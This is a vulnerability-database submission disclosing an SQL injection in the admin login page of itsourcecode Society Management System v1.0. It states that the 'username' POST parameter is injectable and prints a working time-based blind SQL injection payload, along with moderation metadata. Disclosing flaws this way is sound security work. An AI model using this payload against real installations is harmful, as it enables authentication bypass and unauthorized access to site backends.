Title | itsourcecode Society Management System v1.0 SQLi check_admin.php |
---|
Description | There is an SQL injection vulnerability on the /admin/check_admin.php page, allowing attackers to bypass the password and directly access the website's backend using a universal password.
---
Parameter: username (POST)
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: username=admin' AND (SELECT 9121 FROM (SELECT(SLEEP(5)))lIaJ) AND 'oHbk'='oHbk&password=ad
---
Download Source Code: https://itsourcecode.com/wp-content/uploads/2021/04/Society-Management-System-Project-In-PHP-Free-Download-Source-Code.zip |
---|
Source | ⚠️ https://github.com/DeepMountains/Mirage/blob/main/CVE7-2.md |
---|
User | Dee.Mirage (ID 71702) |
---|
Submission | 07/26/2024 03:07 AM (3 months ago) |
---|
Moderation | 07/28/2024 09:39 PM (3 days later) |
---|
Status | Accepted |
---|
VulDB Entry | 272616 |
---|
Points | 20 |
---|